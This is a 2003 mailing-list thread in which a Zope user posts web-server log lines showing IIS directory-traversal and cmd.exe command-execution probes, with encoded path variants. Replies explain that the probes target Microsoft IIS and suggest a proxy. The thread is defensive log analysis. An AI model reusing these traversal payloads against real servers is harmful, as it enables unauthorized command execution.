Here is my partial zope.log under linux 213.65.154.248 - Anonymous [06/Jan/2003:23:12:21 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:22 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2944 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:23 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2940 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:23 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2940 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:24 +0200] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:25 +0200] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2829 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:26 +0200] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2829 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:27 +0200] "GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2944 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:28 +0200] "GET /scripts/..Á ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:29 +0200] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:30 +0200] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:31 +0200] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:32 +0200] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:33 +0200] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:34 +0200] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" 213.65.154.248 - Anonymous [06/Jan/2003:23:12:35 +0200] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2946 "" "" As I use Zope 2.6.0 under Suze 8.0, is this kind of attacks dangerous or not ? Thanks in advance, Sylvain
Chatton Sylvain wrote:
Here is my partial zope.log under linux
213.65.154.248 - Anonymous [06/Jan/2003:23:12:23 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2940 "" " As I use Zope 2.6.0 under Suze 8.0, is this kind of attacks dangerous or not ?
As you easily can see this one is a attack on an InternetInformationServer (MicroSoft)... No problem for your ZOPE. GET /d/winnt/system32/cmd.exe ~~~~~ -mj
I'd strongly recommend putting Zope behind either Apache/Pound or another proxy. When we had Zope on an external server unprotected it crashed pretty much every day due to these sort of attacks. 6 months ago we put it behind Apache and there hasn't been a single crash since then. A -- Logical Progression Ltd, 3 Randolph Crescent, Edinburgh, EH3 7TH, UK Tel: +44 (0)131 466 9585 Web: http://www.logicalprogression.net/
participants (3)
-
Andrew Veitch -
Chatton Sylvain -
Maik Jablonski